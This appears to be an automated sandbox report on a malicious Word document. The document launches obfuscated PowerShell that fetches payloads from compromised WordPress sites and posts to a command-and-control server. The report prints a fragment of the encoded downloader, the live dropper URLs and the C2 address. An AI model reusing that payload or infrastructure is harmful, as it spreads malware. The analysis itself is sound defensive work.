ACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAK

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?veAvira URL Cloud: Label: malware
                      Source: https://bbjugueteria.com/s6kscx/Z/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.9Avira URL Cloud: Label: malware
                      Source: http://coworkingplus.es/wp-admin/FxmME/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-includes/fz/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1Avira URL Cloud: Label: malware
                      Source: https://armakonarms.com/wp-content/uploads/2020/11/winmark.pngAvira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.jsAvira URL Cloud: Label: malware
                      Source: https://armakonarms.com/brands/Avira URL Cloud: Label: malware
                      Source: https://armakonarms.com/iletisim/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-includes/wlwmanifest.xmlAvira URL Cloud: Label: malware
                      Source: http://armakonarms.comAvira URL Cloud: Label: malware
                      Source: https://armakonarms.com/comments/feed/Avira URL Cloud: Label: malware
                      Source: http://silkonbusiness.matrixinfotechsolution.comAvira URL Cloud: Label: malware
                      Source: https://armakonarms.com/wp-content/uploads/2020/11/winmark-100x100.pngAvira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.9.Avira URL Cloud: Label: malware
                      Source: http://homecass.com/wp-content/iF/PAvira URL Cloud: Label: malware
                      Source: https://armakonarms.com/urun-kategori/pump-action-2/Avira URL Cloud: Label: malware
                      Source: http://homecass.com/wp-content/iF/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.9.Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-includes/js/wp-embed.min.js?ver=5.6Avira URL Cloud: Label: malware
                      Source: https://armakonarms.com/urun-kategori/short-pump-action/Avira URL Cloud: Label: malware
                      Source: https://armakonarms.com/feed/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/themes/neve/assets/css/woocommerce.min.css?ver=2.10.0Avira URL Cloud: Label: malware
                      Source: https://armakonarms.com/wp-json/Avira URL Cloud: Label: malware
                      Source: http://coworkingplus.esAvira URL Cloud: Label: malware
                      Source: https://armakonarms.com/urun-kategori/semi-auto/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1Avira URL Cloud: Label: malware
                      Source: https://armakonarms.com/Avira URL Cloud: Label: malware
                      Source: https://www.bimception.com/wp-admin/sHy5t/Avira URL Cloud: Label: malware
                      Source: https://armakonarms.com/wp-content/uploads/2021/01/armakon.pngAvira URL Cloud: Label: malware
                      Source: http://silkonbusiness.matrixinfotechsolution.com/js/q26/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/themes/neve/style.min.css?ver=2.10.0Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-stylAvira URL Cloud: Label: malware
                      Source: https://armakonarms.com/xmlrpc.php?rsdAvira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.9.1Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/themes/neve/assets/js/build/modern/frontend.js?ver=2.10.0Avira URL Cloud: Label: malware
                      Source: http://alugrama.com.mx/t/2/Avira URL Cloud: Label: malware
                      Source: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: armakonarms.comVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 79a2gzs3gkk.docVirustotal: Detection: 57%Perma Link
                      Source: 79a2gzs3gkk.docMetadefender: Detection: 32%Perma Link
                      Source: 79a2gzs3gkk.docReversingLabs: Detection: 65%

                      Compliance:

                      barindex
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2095147519.0000000002B97000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2099358220.000000001B830000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: global trafficDNS query: name: coworkingplus.es
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 162.241.60.240:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.21.89.78:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in memory: <div id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><img style="height:4em" class="logo" src="https://armakonarms.com/wp-content/uploads/2021/01/armakon.png" alt="logo"><hr class="space s"><p>Follow us on social media</p><hr class="space s"><div class="btn-group social-group btn-group-icons"><a style="margin:10px;" target="_blank" href="https://www.facebook.com/armakonarms" title="Facebook" rel="noopener"><i class="fa fa-facebook"></i></a><a style="margin:10px;" target="_blank" href="https://www.instagram.com/armakonarms" title="Instagram" rel="noopener"><i class="fa fa-instagram"></i></a><a style="margin:10px;" target="_blank" href="https://www.twitter.com/armakonarms" title="Twitter" rel="noopener"><i class="fa fa-twitter "></i></a><a style="margin:10px;" target="_blank" href="https://www.youtube.com/channel" title="Youtube" rel="noopener"><i class="fa fa-youtube-play "></i></a></div></div></div></div>
                      Source: powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmpString found in memory: http://coworkingplus.es/wp-admin/FxmME/!http://silkonbusiness.matrixinfotechsolution.com/js/q26/!https://bbjugueteria.com/s6kscx/Z/!https://www.bimception.com/wp-admin/sHy5t/!http://armakonarms.com/wp-includes/fz/!http://alugrama.com.mx/t/2/!http://homecass.com/wp-content/iF/
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 195.159.28.230:8080
                      Source: global trafficHTTP traffic detected: GET /wp-admin/FxmME/ HTTP/1.1Host: coworkingplus.esConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /js/q26/ HTTP/1.1Host: silkonbusiness.matrixinfotechsolution.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/fz/ HTTP/1.1Host: armakonarms.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /t/2/ HTTP/1.1Host: alugrama.com.mxConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 195.159.28.230 195.159.28.230
                      Source: Joe Sandbox ViewIP Address: 69.38.130.14 69.38.130.14
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: Joe Sandbox ViewASN Name: ASN-CATCHCOMNO ASN-CATCHCOMNO
                      Source: global trafficHTTP traffic detected: POST /qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ HTTP/1.1DNT: 0Referer: 195.159.28.230/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/Content-Type: multipart/form-data; boundary=---------------------iENsjsNk0B6FOMTAZLRMtUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 195.159.28.230:8080Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.38.130.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 69.38.130.14
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: unknownTCP traffic detected without corresponding DNS query: 195.159.28.230
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0E909297-30AB-4901-9D2A-3CE504568F55}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-admin/FxmME/ HTTP/1.1Host: coworkingplus.esConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /js/q26/ HTTP/1.1Host: silkonbusiness.matrixinfotechsolution.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-includes/fz/ HTTP/1.1Host: armakonarms.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /t/2/ HTTP/1.1Host: alugrama.com.mxConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: <div id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><img style="height:4em" class="logo" src="https://armakonarms.com/wp-content/uploads/2021/01/armakon.png" alt="logo"><hr class="space s"><p>Follow us on social media</p><hr class="space s"><div class="btn-group social-group btn-group-icons"><a style="margin:10px;" target="_blank" href="https://www.facebook.com/armakonarms" title="Facebook" rel="noopener"><i class="fa fa-facebook"></i></a><a style="margin:10px;" target="_blank" href="https://www.instagram.com/armakonarms" title="Instagram" rel="noopener"><i class="fa fa-instagram"></i></a><a style="margin:10px;" target="_blank" href="https://www.twitter.com/armakonarms" title="Twitter" rel="noopener"><i class="fa fa-twitter "></i></a><a style="margin:10px;" target="_blank" href="https://www.youtube.com/channel" title="Youtube" rel="noopener"><i class="fa fa-youtube-play "></i></a></div></div></div></div> equals www.facebook.com (Facebook)
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: <div id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><img style="height:4em" class="logo" src="https://armakonarms.com/wp-content/uploads/2021/01/armakon.png" alt="logo"><hr class="space s"><p>Follow us on social media</p><hr class="space s"><div class="btn-group social-group btn-group-icons"><a style="margin:10px;" target="_blank" href="https://www.facebook.com/armakonarms" title="Facebook" rel="noopener"><i class="fa fa-facebook"></i></a><a style="margin:10px;" target="_blank" href="https://www.instagram.com/armakonarms" title="Instagram" rel="noopener"><i class="fa fa-instagram"></i></a><a style="margin:10px;" target="_blank" href="https://www.twitter.com/armakonarms" title="Twitter" rel="noopener"><i class="fa fa-twitter "></i></a><a style="margin:10px;" target="_blank" href="https://www.youtube.com/channel" title="Youtube" rel="noopener"><i class="fa fa-youtube-play "></i></a></div></div></div></div> equals www.twitter.com (Twitter)
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: <div id="custom_html-3" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><img style="height:4em" class="logo" src="https://armakonarms.com/wp-content/uploads/2021/01/armakon.png" alt="logo"><hr class="space s"><p>Follow us on social media</p><hr class="space s"><div class="btn-group social-group btn-group-icons"><a style="margin:10px;" target="_blank" href="https://www.facebook.com/armakonarms" title="Facebook" rel="noopener"><i class="fa fa-facebook"></i></a><a style="margin:10px;" target="_blank" href="https://www.instagram.com/armakonarms" title="Instagram" rel="noopener"><i class="fa fa-instagram"></i></a><a style="margin:10px;" target="_blank" href="https://www.twitter.com/armakonarms" title="Twitter" rel="noopener"><i class="fa fa-twitter "></i></a><a style="margin:10px;" target="_blank" href="https://www.youtube.com/channel" title="Youtube" rel="noopener"><i class="fa fa-youtube-play "></i></a></div></div></div></div> equals www.youtube.com (Youtube)
                      Source: rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: coworkingplus.es
                      Source: unknownHTTP traffic detected: POST /qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ HTTP/1.1DNT: 0Referer: 195.159.28.230/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/Content-Type: multipart/form-data; boundary=---------------------iENsjsNk0B6FOMTAZLRMtUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 195.159.28.230:8080Content-Length: 5492Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Jan 2021 17:03:28 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: powershell.exe, 00000005.00000002.2098710061.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: http://alugrama.com.mx
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmpString found in binary or memory: http://alugrama.com.mx/t/2/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=4.9.1
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=4.9
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=4.9.1
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=4.9.
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=4
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=4.9.
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ve
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors-styl
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/themes/neve/assets/css/woocommerce.min.css?ver=2.10.0
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/themes/neve/assets/js/build/modern/frontend.js?ver=2.10.0
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-content/themes/neve/style.min.css?ver=2.10.0
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-includes/fz/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-includes/js/wp-embed.min.js?ver=5.6
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://armakonarms.com/wp-includes/wlwmanifest.xml
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://coworkingplus.es
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2099346146.000000001B4E8000.00000004.00000001.sdmpString found in binary or memory: http://coworkingplus.es/wp-admin/FxmME/
                      Source: powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                      Source: powershell.exe, 00000005.00000002.2098478813.0000000003985000.00000004.00000001.sdmpString found in binary or memory: http://homecass.com/wp-content/iF/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://homecass.com/wp-content/iF/P
                      Source: rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: rundll32.exe, 00000006.00000002.2108743988.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107723708.0000000001F50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116055655.0000000002140000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125487050.0000000001F50000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2095188433.0000000002C04000.00000004.00000001.sdmpString found in binary or memory: http://localhost/wp-content/uploads/2020/08/longbg.jpg
                      Source: rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: rundll32.exe, 00000006.00000002.2109180444.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107856100.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2116302224.0000000002327000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2125810547.0000000002137000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2136021936.0000000002137000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2097744742.00000000030F8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
